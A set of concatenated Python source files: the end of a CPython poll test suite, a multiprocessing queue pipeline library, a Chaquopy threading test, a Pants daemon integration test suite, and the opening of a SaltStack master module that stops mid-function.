#15989, #17919 self.assertRaises(ValueError, pollster.register, 0, -1) self.assertRaises(OverflowError, pollster.register, 0, 1 << 64) self.assertRaises(ValueError, pollster.modify, 1, -1) self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64) @cpython_only def test_poll_c_limits(self): from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX pollster = select.poll() pollster.register(1) # Issues #15989, #17919 self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1) self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1) self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1) self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1) @reap_threads def test_threaded_poll(self): r, w = os.pipe() self.addCleanup(os.close, r) self.addCleanup(os.close, w) rfds = [] for i in range(10): fd = os.dup(r) self.addCleanup(os.close, fd) rfds.append(fd) pollster = select.poll() for fd in rfds: pollster.register(fd, select.POLLIN) t = threading.Thread(target=pollster.poll) t.start() try: time.sleep(0.5) # trigger ufds array reallocation for fd in rfds: pollster.unregister(fd) pollster.register(w, select.POLLOUT) self.assertRaises(RuntimeError, pollster.poll) finally: # and make the call to poll() from the thread return os.write(w, b'spam') t.join() @unittest.skipUnless(threading, 'Threading required for this test.') @reap_threads def test_poll_blocks_with_negative_ms(self): for timeout_ms in [None, -1000, -1, -1.0, -0.1, -1e-100]: # Create two file descriptors. This will be used to unlock # the blocking call to poll.poll inside the thread r, w = os.pipe() pollster = select.poll() pollster.register(r, select.POLLIN) poll_thread = threading.Thread(target=pollster.poll, args=(timeout_ms,)) poll_thread.start() poll_thread.join(timeout=0.1) self.assertTrue(poll_thread.is_alive()) # Write to the pipe so pollster.poll unblocks and the thread ends. os.write(w, b'spam') poll_thread.join() self.assertFalse(poll_thread.is_alive()) os.close(r) os.close(w) def test_main(): run_unittest(PollTests) if __name__ == '__main__': test_main()
main.py
import logging from multiprocessing import JoinableQueue, Manager, Process, Queue from multiprocessing.managers import SyncManager from typing import Callable, Iterable, List, Union from .constants import QueueFlags, QueueNames logger = logging.getLogger('QueueAutomator') class QueueAutomator: """ QueueAutomator is a wrapper that provides an easy to use API to build queue multiprocessing pipelines Example: >>> automator = QueueAutomator() >>> >>> @automator.register_as_worker_function(output_queue_name='queue', process_count=2) >>> def do_work(item): >>> ... >>> >>> @automator.register_as_worker_function(input_queue_name='queue', process_count=2) >>> def do_work_2(item): >>> ... >>> >>> if __name__ == '__main__': >>> automator.set_input_data([...]]) >>> results = automator.run() """ def __init__(self, name: Union[str, None] = None) -> 'QueueAutomator': self.__queue_table: dict = { QueueNames.OUTPUT: { 'target': None, 'process_count': None, 'worker_function': None }, } self.input_data = None self.name = name or '' def __repr__(self) -> str: return f'QueueAutomator[{self.name}]' def __validate_non_empty_args(self, args: list): for arg in args: if not args: raise ValueError(f'{arg} should not be empty or zero') def __build_queue(self, name: str, target: str, process_count: int, worker_function: Callable) -> dict: return { name: { 'target': target, 'process_count': process_count, 'worker_function': worker_function } } def __generate_queues(self, queues: list, manager: SyncManager, name: str): if name == QueueNames.OUTPUT: self.__queue_table[name]['queue'] = manager.Queue(0) return if name not in self.__queue_table: raise RuntimeError(f'{name} does not exist in queue map, register a worker function with input_queue_name={name}') current_queue = self.__queue_table[name] if current_queue.get('queue'): raise RuntimeError(f'{name} was already created, you may be creating a circular pipeline') next_queue = current_queue['target'] current_queue['queue'] = manager.JoinableQueue() queues.append((name, next_queue)) return self.__generate_queues(queues, manager, next_queue) def __enqueue_input_data(self): input_queue = self.__queue_table[QueueNames.INPUT].get('queue') if not input_queue: RuntimeError('enqueue_items was called before input queue was initialized, this should not happen') if not self.input_data: RuntimeError('input_data is empty, no data to process') for item in self.input_data: input_queue.put(item) def _process_enqueued_objects(self, in_queue: JoinableQueue, out_queue: Queue, worker_function: Callable): while True: input_object = in_queue.get() if input_object != QueueFlags.EXIT: result = worker_function(input_object) out_queue.put(result) in_queue.task_done() else: in_queue.task_done() logger.debug('_>>> Done <<<_') return def __spawn_processes(self, in_queue_name: str, out_queue_name: str) -> List[Process]: in_queue = self.__queue_table[in_queue_name] out_queue = self.__queue_table[out_queue_name] target = self._process_enqueued_objects process_list = list() for _ in range(in_queue['process_count']): process = Process(target=target, args=(in_queue['queue'], out_queue['queue'], in_queue['worker_function'])) process.start() process_list.append(process) logger.debug(f'Started {process.name} for queue {in_queue_name}') return process_list def __join_processes(self, process_list: list): for process in process_list: process.join() def __signal_queue_exit(self, queue: JoinableQueue, num_processes: int): for _ in range(num_processes): queue.put(QueueFlags.EXIT) def __recover_from_queue(self, queue: Queue, manager=False) -> list: results = [] while not queue.empty(): results.append(queue.get()) if manager: queue.task_done() return results def set_input_data(self, input_data: Iterable): """ This function is used to set the data to be processed in the pipeline Args: input_data (Iterable) """ self.input_data = input_data def register_as_worker_function(self, input_queue_name: str = QueueNames.INPUT, output_queue_name: str = QueueNames.OUTPUT, process_count: int = 1) -> Callable: """ Decorator to register your functions to process data as part of a multiprocessing queue pipeline Args: input_queue_name (str, optional): The name of the input queue for this function. Defaults to 'input'. output_queue_name (Union[str, None], optional): the name of the output queue for this function. Defaults to None. process_count (int, optional): The ammount of processes to listen to the given input queue. Defaults to 1. Raises: RuntimeError: If input_queue_name is already registered, use unique names ValueError: If input_queue_name is none or process_count is <= 0 Returns: Callable: The wrapped function after registering it. """ self.__validate_non_empty_args((input_queue_name, process_count, output_queue_name)) if input_queue_name in self.__queue_table: raise RuntimeError(f'{input_queue_name} already exists in queue table, pick another name') if process_count < 0: raise ValueError('process_count cannot be a negative number') def store_in_queue_table_wrapper(func: Callable) -> Callable: self.__queue_table.update( self.__build_queue(input_queue_name, output_queue_name or QueueNames.OUTPUT, process_count, func) ) return func return store_in_queue_table_wrapper def run(self) -> list: """ Is the main entry point to execute your program with a multiprocessing queue pipeline. To use it you need to register at least 1 worker function Do not forget to call set_input_data(Iterable) before calling run() Returns: list: The output as a simple python list """ manager = Manager() queues = [] self.__generate_queues(queues, manager, QueueNames.INPUT) process_per_queue = tuple((input_queue, self.__spawn_processes(input_queue, output_queue)) for input_queue, output_queue in queues) self.__enqueue_input_data() for queue_name, procesess in process_per_queue: current_queue = self.__queue_table[queue_name] current_queue['queue'].join() self.__signal_queue_exit(current_queue['queue'], current_queue['process_count']) self.__join_processes(procesess) return self.__recover_from_queue(self.__queue_table[QueueNames.OUTPUT]['queue'], True)
test_thread.py
import _thread from java import detach, jclass from time import time, sleep from threading import Thread from .test_utils import FilterWarningsCase from com.chaquo.python import TestThread as JavaTestThread from java.lang import String class TestThread(FilterWarningsCase): def test_gil_release_method(self): self.check_gil_release(JavaTestThread.BlockingMethods.blockStatic) self.check_gil_release(JavaTestThread.BlockingMethods().blockInstance) def test_gil_release_constructor(self): self.check_gil_release(JavaTestThread.BlockingConstructor) def check_gil_release(self, blocking_func): self.assertFalse(JavaTestThread.blocked) delay = 0.1 deadline = time() + (delay * 2) thread = Thread(target=blocking_func, args=[int(delay * 1000)]) thread.start() while not JavaTestThread.blocked: # Thread not started yet sleep(delay / 10) self.assertLess(time(), deadline) # If the GIL was not released, we'll never get to this point, because `blocked` is only # true while the Java function is actually executing. while JavaTestThread.blocked: # Thread is sleeping sleep(delay / 10) self.assertLess(time(), deadline) thread.join() # The detach tests contain no assertions, but they will crash on Android if the detach # doesn't take place. def test_detach_manual(self): def run(): String.valueOf(99) detach() _thread.start_new_thread(run, ()) def test_detach_target(self): thread = Thread(target=lambda: String.valueOf(99)) thread.start() thread.join() def test_detach_run(self): class MyThread(Thread): def run(self): String.valueOf(99) thread = MyThread() thread.start() thread.join() def test_detach_unattached(self): # This thread doesn't use any Java features, so should remain unattached. thread = Thread(target=lambda: None) thread.start() thread.join() def test_detach_python_exception(self): def run(): raise Exception("Expected Python exception (this is not a test failure)") thread = Thread(target=run) thread.start() thread.join() def test_detach_java_exception(self): def run(): from java.lang import Integer Integer.parseInt("Expected Java exception (this is not a test failure)") thread = Thread(target=run) thread.start() thread.join() # Test we don't run into ClassLoader issues looking up app classes from other threads. def test_app_class(self): result = [] def run(): result.append(jclass("com.chaquo.python.TestThreadAppClass")) thread = Thread(target=run) thread.start() thread.join() self.assertEqual("hello world", result[0].STR)
pantsd_integration_test.py
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). import datetime import os import re import signal import threading import time import unittest from textwrap import dedent import pytest from pants.testutil.pants_integration_test import read_pantsd_log, temporary_workdir from pants.util.contextutil import environment_as, temporary_dir, temporary_file from pants.util.dirutil import rm_rf, safe_file_dump, safe_mkdir, safe_open, touch from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase def launch_file_toucher(f): """Launch a loop to touch the given file, and return a function to call to stop and join it.""" if not os.path.isfile(f): raise AssertionError("Refusing to touch a non-file.") halt = threading.Event() def file_toucher(): while not halt.isSet(): touch(f) time.sleep(1) thread = threading.Thread(target=file_toucher) thread.daemon = True thread.start() def join(): halt.set() thread.join(timeout=10) return join class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase): hermetic = False def test_pantsd_run(self): with self.pantsd_successful_run_context(log_level="debug") as ctx: ctx.runner(["list", "3rdparty::"]) ctx.checker.assert_started() ctx.runner(["list", "3rdparty::"]) ctx.checker.assert_running() def test_pantsd_broken_pipe(self): with self.pantsd_test_context() as (workdir, pantsd_config, checker): run = self.run_pants_with_workdir( "help | head -1", workdir=workdir, config=pantsd_config, shell=True ) self.assertNotIn("broken pipe", run.stderr.lower()) checker.assert_started() def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self): with self.pantsd_test_context() as (workdir, pantsd_config, checker): # Run target that throws an exception in pants. self.run_pants_with_workdir( ["lint", "testprojects/src/python/unicode/compilation_failure"], workdir=workdir, config=pantsd_config, ).assert_failure() checker.assert_started() # Assert pantsd is in a good functional state. self.run_pants_with_workdir( ["help"], workdir=workdir, config=pantsd_config ).assert_success() checker.assert_running() def test_pantsd_lifecycle_invalidation(self): """Run with different values of daemon=True options, which should trigger restarts.""" with self.pantsd_successful_run_context() as ctx: last_pid = None for idx in range(3): # Run with a different value of a daemon=True option in each iteration. ctx.runner([f"--pantsd-invalidation-globs=ridiculous{idx}", "help"]) next_pid = ctx.checker.assert_started() if last_pid is not None: self.assertNotEqual(last_pid, next_pid) last_pid = next_pid def test_pantsd_lifecycle_non_invalidation(self): with self.pantsd_successful_run_context() as ctx: cmds = (["help"], ["--no-colors", "help"], ["help"]) last_pid = None for cmd in cmds: # Run with a CLI flag. ctx.runner(cmd) next_pid = ctx.checker.assert_started() if last_pid is not None: self.assertEqual(last_pid, next_pid) last_pid = next_pid def test_pantsd_lifecycle_non_invalidation_on_config_string(self): with temporary_dir() as dist_dir_root, temporary_dir() as config_dir: # Create a variety of config files that change an option that does _not_ affect the # daemon's fingerprint (only the Scheduler's), and confirm that it stays up. config_files = [ os.path.abspath(os.path.join(config_dir, f"pants.{i}.toml")) for i in range(3) ] for idx, config_file in enumerate(config_files): print(f"writing {config_file}") with open(config_file, "w") as fh: fh.write( f"""[GLOBAL]\npants_distdir = "{os.path.join(dist_dir_root, str(idx))}"\n""" ) with self.pantsd_successful_run_context() as ctx: cmds = [[f"--pants-config-files={f}", "help"] for f in config_files] last_pid = None for cmd in cmds: ctx.runner(cmd) next_pid = ctx.checker.assert_started() if last_pid is not None: self.assertEqual(last_pid, next_pid) last_pid = next_pid def test_pantsd_lifecycle_shutdown_for_broken_scheduler(self): with self.pantsd_test_context() as (workdir, config, checker): # Run with valid options. self.run_pants_with_workdir(["help"], workdir=workdir, config=config).assert_success() checker.assert_started() # And again with invalid scheduler-fingerprinted options that trigger a re-init. self.run_pants_with_workdir( ["--backend-packages=nonsensical", "help"], workdir=workdir, config=config ).assert_failure() checker.assert_stopped() def test_pantsd_aligned_output(self) -> None: # Set for pytest output display. self.maxDiff = None cmds = [["help", "goals"], ["help", "targets"], ["roots"]] non_daemon_runs = [self.run_pants(cmd) for cmd in cmds] with self.pantsd_successful_run_context() as ctx: daemon_runs = [ctx.runner(cmd) for cmd in cmds] ctx.checker.assert_started() for cmd, run in zip(cmds, daemon_runs): print(f"(cmd, run) = ({cmd}, {run.stdout}, {run.stderr_data})") self.assertNotEqual(run.stdout, "", f"Empty stdout for {cmd}") for run_pair in zip(non_daemon_runs, daemon_runs): non_daemon_stdout = run_pair[0].stdout daemon_stdout = run_pair[1].stdout for line_pair in zip(non_daemon_stdout.splitlines(), daemon_stdout.splitlines()): assert line_pair[0] == line_pair[1] @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7622") def test_pantsd_filesystem_invalidation(self): """Runs with pantsd enabled, in a loop, while another thread invalidates files.""" with self.pantsd_successful_run_context() as ctx: cmd = ["list", "::"] ctx.runner(cmd) ctx.checker.assert_started() # Launch a separate thread to poke files in 3rdparty. join = launch_file_toucher("3rdparty/jvm/com/google/auto/value/BUILD") # Repeatedly re-list 3rdparty while the file is being invalidated. for _ in range(0, 16): ctx.runner(cmd) ctx.checker.assert_running() join() def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self): EXPECTED_KEY = "TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST" EXPECTED_VALUE = "333" with self.pantsd_successful_run_context() as ctx: # First, launch the daemon without any local env vars set. ctx.runner(["help"]) ctx.checker.assert_started() # Then, set an env var on the secondary call. # We additionally set the `HERMETIC_ENV` env var to allow the integration test harness # to pass this variable through. env = { EXPECTED_KEY: EXPECTED_VALUE, "HERMETIC_ENV": EXPECTED_KEY, } with environment_as(**env): result = ctx.runner( ["run", "testprojects/src/python/print_env", "--", EXPECTED_KEY] ) ctx.checker.assert_running() self.assertEqual(EXPECTED_VALUE, "".join(result.stdout).strip()) def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self): with self.pantsd_test_context() as (workdir, pantsd_config, checker): with environment_as(NO_LEAKS="33"): self.run_pants_with_workdir( ["help"], workdir=workdir, config=pantsd_config ).assert_success() checker.assert_started() self.run_pants_with_workdir( ["run", "testprojects/src/python/print_env", "--", "NO_LEAKS"], workdir=workdir, config=pantsd_config, ).assert_failure() checker.assert_running() def test_pantsd_touching_a_file_does_not_restart_daemon(self): test_file = "testprojects/src/python/print_env/main.py" config = { "GLOBAL": {"pantsd_invalidation_globs": '["testprojects/src/python/print_env/*"]'} } with self.pantsd_successful_run_context(extra_config=config) as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(5) ctx.checker.assert_running() touch(test_file) # Permit ample time for the async file event propagate in CI. time.sleep(10) ctx.checker.assert_running() def test_pantsd_invalidation_file_tracking(self): test_dir = "testprojects/src/python/print_env" config = {"GLOBAL": {"pantsd_invalidation_globs": f'["{test_dir}/*"]'}} with self.pantsd_successful_run_context(extra_config=config) as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(5) ctx.checker.assert_running() def full_pantsd_log(): return "\n".join(read_pantsd_log(ctx.workdir)) # Create a new file in test_dir with temporary_file(suffix=".py", binary_mode=False, root_dir=test_dir) as temp_f: temp_f.write("import that\n") temp_f.close() ctx.checker.assert_stopped() self.assertIn("saw filesystem changes covered by invalidation globs", full_pantsd_log()) def test_pantsd_invalidation_pants_toml_file(self): # Test tmp_pants_toml (--pants-config-files=$tmp_pants_toml)'s removal tmp_pants_toml = os.path.abspath("testprojects/test_pants.toml") # Create tmp_pants_toml file with safe_open(tmp_pants_toml, "w") as f: f.write("[DEFAULT]\n") with self.pantsd_successful_run_context() as ctx: ctx.runner([f"--pants-config-files={tmp_pants_toml}", "help"]) ctx.checker.assert_started() time.sleep(10) # Delete tmp_pants_toml os.unlink(tmp_pants_toml) ctx.checker.assert_stopped() def test_pantsd_pid_deleted(self): with self.pantsd_successful_run_context() as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(10) ctx.checker.assert_running() subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"] os.unlink(os.path.join(subprocess_dir, "pantsd", "pid")) ctx.checker.assert_stopped() def test_pantsd_pid_change(self): with self.pantsd_successful_run_context() as ctx: ctx.runner(["help"]) ctx.checker.assert_started() # Let any fs events quiesce. time.sleep(10) ctx.checker.assert_running() subprocess_dir = ctx.pantsd_config["GLOBAL"]["pants_subprocessdir"] pidpath = os.path.join(subprocess_dir, "pantsd", "pid") with open(pidpath, "w") as f: f.write("9") ctx.checker.assert_stopped() # Remove the pidfile so that the teardown script doesn't try to kill process 9. os.unlink(pidpath) @pytest.mark.skip(reason="flaky: https://github.com/pantsbuild/pants/issues/8193") def test_pantsd_memory_usage(self): """Validates that after N runs, memory usage has increased by no more than X percent.""" number_of_runs = 10 max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647 with self.pantsd_successful_run_context() as ctx: # NB: This doesn't actually run against all testprojects, only those that are in the chroot, # i.e. explicitly declared in this test file's BUILD. cmd = ["list", "testprojects::"] ctx.runner(cmd).assert_success() initial_memory_usage = ctx.checker.current_memory_usage() for _ in range(number_of_runs): ctx.runner(cmd).assert_success() ctx.checker.assert_running() final_memory_usage = ctx.checker.current_memory_usage() self.assertTrue( initial_memory_usage <= final_memory_usage, "Memory usage inverted unexpectedly: {} > {}".format( initial_memory_usage, final_memory_usage ), ) increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0 self.assertTrue( increase_fraction <= max_memory_increase_fraction, "Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format( initial_memory_usage, final_memory_usage, increase_fraction, max_memory_increase_fraction, ), ) def test_pantsd_max_memory_usage(self): """Validates that the max_memory_usage setting is respected.""" # We set a very, very low max memory usage, which forces pantsd to restart immediately. max_memory_usage_bytes = 130 with self.pantsd_successful_run_context() as ctx: # TODO: We run the command, but we expect it to race pantsd shutting down, so we don't # assert success. https://github.com/pantsbuild/pants/issues/8200 will address waiting # until after the current command completes to invalidate the scheduler, at which point # we can assert success here. ctx.runner( [f"--pantsd-max-memory-usage={max_memory_usage_bytes}", "list", "testprojects::"] ) # Assert that a pid file is written, but that the server stops afterward. ctx.checker.assert_started_and_stopped() def test_pantsd_invalidation_stale_sources(self): test_path = "daemon_correctness_test_0001" test_build_file = os.path.join(test_path, "BUILD") test_src_file = os.path.join(test_path, "some_file.py") filedeps_cmd = ["--files-not-found-behavior=warn", "filedeps", test_path] try: with self.pantsd_successful_run_context() as ctx: safe_mkdir(test_path, clean=True) ctx.runner(["help"]) ctx.checker.assert_started() safe_file_dump( test_build_file, "python_library(sources=['some_non_existent_file.py'])" ) non_existent_file = os.path.join(test_path, "some_non_existent_file.py") result = ctx.runner(filedeps_cmd) ctx.checker.assert_running() assert non_existent_file not in result.stdout safe_file_dump(test_build_file, "python_library(sources=['*.py'])") result = ctx.runner(filedeps_cmd) ctx.checker.assert_running() assert non_existent_file not in result.stdout safe_file_dump(test_src_file, "print('hello')\n") result = ctx.runner(filedeps_cmd) ctx.checker.assert_running() assert test_src_file in result.stdout finally: rm_rf(test_path) @unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654") def test_pantsd_parse_exception_success(self): # This test covers the case described in #6426, where a run that is failing fast due to an # exception can race other completing work. We expect all runs to fail due to the error # that has been introduced, but none of them should hang. test_path = "testprojects/3rdparty/this_is_definitely_not_a_valid_directory" test_build_file = os.path.join(test_path, "BUILD") invalid_symbol = "this_is_definitely_not_a_valid_symbol" try: safe_mkdir(test_path, clean=True) safe_file_dump(test_build_file, f"{invalid_symbol}()") for _ in range(3): with self.pantsd_run_context(success=False) as ctx: result = ctx.runner(["list", "testprojects::"]) ctx.checker.assert_started() self.assertIn(invalid_symbol, result.stderr_data) finally: rm_rf(test_path) @unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654") def test_pantsd_multiple_parallel_runs(self): with self.pantsd_test_context() as (workdir, config, checker): file_to_make = os.path.join(workdir, "some_magic_file") waiter_handle = self.run_pants_with_workdir_without_waiting( ["run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make], workdir=workdir, config=config, ) checker.assert_started() checker.assert_pantsd_runner_started(waiter_handle.process.pid) creator_handle = self.run_pants_with_workdir_without_waiting( ["run", "testprojects/src/python/coordinated_runs:creator", "--", file_to_make], workdir=workdir, config=config, ) creator_handle.join().assert_success() waiter_handle.join().assert_success() def _assert_pantsd_keyboardinterrupt_signal(self, signum, regexps=[], quit_timeout=None): """Send a signal to the thin pailgun client and observe the error messaging. :param int signum: The signal to send. :param regexps: Assert that all of these regexps match somewhere in stderr. :type regexps: list of str :param float quit_timeout: The duration of time to wait for the pailgun client to flush all of its output and die after being killed. """ # TODO: This tests that pantsd processes actually die after the thin client receives the # specified signal. with self.pantsd_test_context() as (workdir, config, checker): # Launch a run that will wait for a file to be created (but do not create that file). file_to_make = os.path.join(workdir, "some_magic_file") if quit_timeout is not None: timeout_args = [f"--pantsd-pailgun-quit-timeout={quit_timeout}"] else: timeout_args = [] argv = timeout_args + [ "run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make, ] waiter_handle = self.run_pants_with_workdir_without_waiting( argv, workdir=workdir, config=config ) client_pid = waiter_handle.process.pid checker.assert_started() checker.assert_pantsd_runner_started(client_pid) # This should kill the pantsd processes through the RemotePantsRunner signal handler. os.kill(client_pid, signum) waiter_run = waiter_handle.join() waiter_run.assert_failure() for regexp in regexps: self.assertRegex(waiter_run.stderr, regexp) time.sleep(5) checker.assert_stopped() @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7554") def test_pantsd_sigterm(self): self._assert_pantsd_keyboardinterrupt_signal( signal.SIGTERM, regexps=[ "\\[INFO\\] Sending SIGTERM to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.", re.escape( "\nSignal {signum} (SIGTERM) was raised. Exiting with failure.\n".format( signum=signal.SIGTERM ) ), """ Interrupted by user: Interrupted by user over pailgun client! $""", ], ) @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7572") def test_pantsd_sigquit(self): self._assert_pantsd_keyboardinterrupt_signal( signal.SIGQUIT, regexps=[ "\\[INFO\\] Sending SIGQUIT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.", re.escape( "\nSignal {signum} (SIGQUIT) was raised. Exiting with failure.\n".format( signum=signal.SIGQUIT ) ), """ Interrupted by user: Interrupted by user over pailgun client! $""", ], ) @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7547") def test_pantsd_sigint(self): self._assert_pantsd_keyboardinterrupt_signal( signal.SIGINT, regexps=[ """\ \\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\. Interrupted by user. Interrupted by user: Interrupted by user over pailgun client! $""" ], ) @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/7457") def test_signal_pailgun_stream_timeout(self): # NB: The actual timestamp has the date and time at sub-second granularity. The date is just # used here since that is known in advance in order to assert that the timestamp is well-formed. today = datetime.date.today().isoformat() self._assert_pantsd_keyboardinterrupt_signal( signal.SIGINT, regexps=[ """\ \\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 0\\.01 seconds before sending SIGKILL\\.\\.\\. Interrupted by user\\. [^ ]* \\[WARN\\] timed out when attempting to gracefully shut down the remote client executing \ "'pantsd.*'"\\. sending SIGKILL to the remote client at pid: [0-9]+\\. message: iterating \ over bytes from nailgun timed out with timeout interval 0\\.01 starting at {today}T[^\n]+, \ overtime seconds: [^\n]+ Interrupted by user: Interrupted by user over pailgun client! """.format( today=re.escape(today) ) ], # NB: Make the timeout very small to ensure the warning message will reliably occur in CI! quit_timeout=1e-6, ) @unittest.skip( reason="This started consistently hanging on Jan. 13, 2020 for some unknown reason." ) def test_sigint_kills_request_waiting_for_lock(self): """Test that, when a pailgun request is blocked waiting for another one to end, sending SIGINT to the blocked run will kill it. Regression test for issue: #7920 """ config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": -1, "level": "debug"}} with self.pantsd_test_context(extra_config=config) as (workdir, config, checker): # Run a repl, so that any other run waiting to acquire the daemon lock waits forever. first_run_handle = self.run_pants_with_workdir_without_waiting( command=["repl", "examples/src/python/example/hello::"], workdir=workdir, config=config, ) checker.assert_started() checker.assert_running() blocking_run_handle = self.run_pants_with_workdir_without_waiting( command=["goals"], workdir=workdir, config=config ) # Block until the second request is waiting for the lock. blocked = True while blocked: log = "\n".join(read_pantsd_log(workdir)) if "didn't acquire the lock on the first try, polling." in log: blocked = False # NB: This sleep is totally deterministic, it's just so that we don't spend too many cycles # busy waiting. time.sleep(0.1) # Sends SIGINT to the run that is waiting. blocking_run_client_pid = blocking_run_handle.process.pid os.kill(blocking_run_client_pid, signal.SIGINT) blocking_run_handle.join() # Check that pantsd is still serving the other request. checker.assert_running() # Send exit() to the repl, and exit it. result = first_run_handle.join(stdin_data="exit()") result.assert_success() checker.assert_running() def test_pantsd_unicode_environment(self): with self.pantsd_successful_run_context(extra_env={"XXX": "¡"}) as ctx: result = ctx.runner(["help"]) ctx.checker.assert_started() result.assert_success() # This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their # dependency relationship (#7404). def test_dependencies_swap(self): template = dedent( """ python_library( name = 'A', source = 'A.py', {a_deps} ) python_library( name = 'B', source = 'B.py', {b_deps} ) """ ) with self.pantsd_successful_run_context() as ctx: with temporary_dir(".") as directory: safe_file_dump(os.path.join(directory, "A.py"), mode="w") safe_file_dump(os.path.join(directory, "B.py"), mode="w") if directory.startswith("./"): directory = directory[2:] def list_and_verify(): result = ctx.runner(["list", f"{directory}:"]) ctx.checker.assert_started() result.assert_success() expected_targets = {f"{directory}:{target}" for target in ("A", "B")} self.assertEqual(expected_targets, set(result.stdout.strip().split("\n"))) with open(os.path.join(directory, "BUILD"), "w") as f: f.write(template.format(a_deps='dependencies = [":B"],', b_deps="")) list_and_verify() with open(os.path.join(directory, "BUILD"), "w") as f: f.write(template.format(a_deps="", b_deps='dependencies = [":A"],')) list_and_verify() def test_concurrent_overrides_pantsd(self): """Tests that the --concurrent flag overrides the --pantsd flag, because we don't allow concurrent runs under pantsd.""" config = {"GLOBAL": {"concurrent": True, "pantsd": True}} with temporary_workdir() as workdir: pants_run = self.run_pants_with_workdir( ["help", "goals"], workdir=workdir, config=config ) pants_run.assert_success() pantsd_log_location = os.path.join(workdir, "pantsd", "pantsd.log") self.assertFalse(os.path.exists(pantsd_log_location)) def test_unhandled_exceptions_only_log_exceptions_once(self): """Tests that the unhandled exceptions triggered by LocalPantsRunner instances don't manifest as a PantsRunFinishedWithFailureException. That is, that we unset the global Exiter override set by LocalPantsRunner before we try to log the exception. This is a regression test for the most glaring case of https://github.com/pantsbuild/pants/issues/7597. """ with self.pantsd_run_context(success=False) as ctx: result = ctx.runner(["run", "testprojects/src/python/bad_requirements:use_badreq"]) ctx.checker.assert_running() result.assert_failure() # Assert that the desired exception has been triggered once. self.assertRegex(result.stderr_data, r"ERROR:.*badreq==99.99.99") # Assert that it has only been triggered once. self.assertNotIn( "During handling of the above exception, another exception occurred:", result.stderr_data, ) self.assertNotIn( "pants.bin.daemon_pants_runner._PantsRunFinishedWithFailureException: Terminated with 1", result.stderr_data, )
master.py
''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python modules import os import re import time import errno import signal import shutil import logging import hashlib import tempfile import datetime import subprocess import multiprocessing # Import zeromq import zmq # Import Third Party Libs import yaml # RSA Support from M2Crypto import RSA # Import salt modules import salt.crypt import salt.utils import salt.client import salt.payload import salt.pillar import salt.state import salt.runner import salt.utils.event from salt.utils.debug import enable_sigusr1_handler log = logging.getLogger(__name__) def clean_proc(proc, wait_for_kill=10): ''' Generic method for cleaning up multiprocessing procs ''' # NoneType and other fun stuff need not apply if not proc: return try: waited = 0 while proc.is_alive(): proc.terminate() waited += 1 time.sleep(0.1) if proc.is_alive() and (waited >= wait_for_kill): log.error(('Process did not die with terminate(): {0}' .format(proc.pid))) os.kill(signal.SIGKILL, proc.pid) except (AssertionError, AttributeError) as e: # Catch AssertionError when the proc is evaluated inside the child # Catch AttributeError when the process dies between proc.is_alive() # and proc.terminate() and turns into a NoneType pass class MasterExit(SystemExit): ''' Named exit exception for the master process exiting ''' pass class SMaster(object): ''' Create a simple salt-master, this will generate the top level master ''' def __init__(self, opts): ''' Create a salt master server instance ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() self.crypticle = self.__prep_crypticle() def __prep_crypticle(self): ''' Return the crypticle used for AES ''' return salt.crypt.Crypticle(self.opts, self.opts['aes']) def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. ''' log.info('Preparing the root key for local communication') keyfile = os.path.join(self.opts['cachedir'], '.root_key') if os.path.isfile(keyfile): with open(keyfile, 'r') as fp_: return fp_.read() else: key = salt.crypt.Crypticle.generate_key_string() cumask = os.umask(191) with open(keyfile, 'w+') as fp_: fp_.write(key) os.umask(cumask) os.chmod(keyfile, 256) return key class Master(SMaster): ''' The salt master server ''' def __init__(self, opts): ''' Create a salt master server instance ''' SMaster.__init__(self, opts) def _clear_old_jobs(self): ''' Clean out the old jobs ''' if self.opts['keep_jobs'] == 0: return jid_root = os.path.join(self.opts['cachedir'], 'jobs') while True: cur = "{0:%Y%m%d%H}".format(datetime.datetime.now()) for top in os.listdir(jid_root): t_path = os.path.join(jid_root, top) for final in os.listdir(t_path): f_path = os.path.join(t_path, final) jid_file = os.path.join(f_path, 'jid') if not os.path.isfile(jid_file): continue with open(jid_file, 'r') as fn_: jid = fn_.read() if len(jid) < 18: # 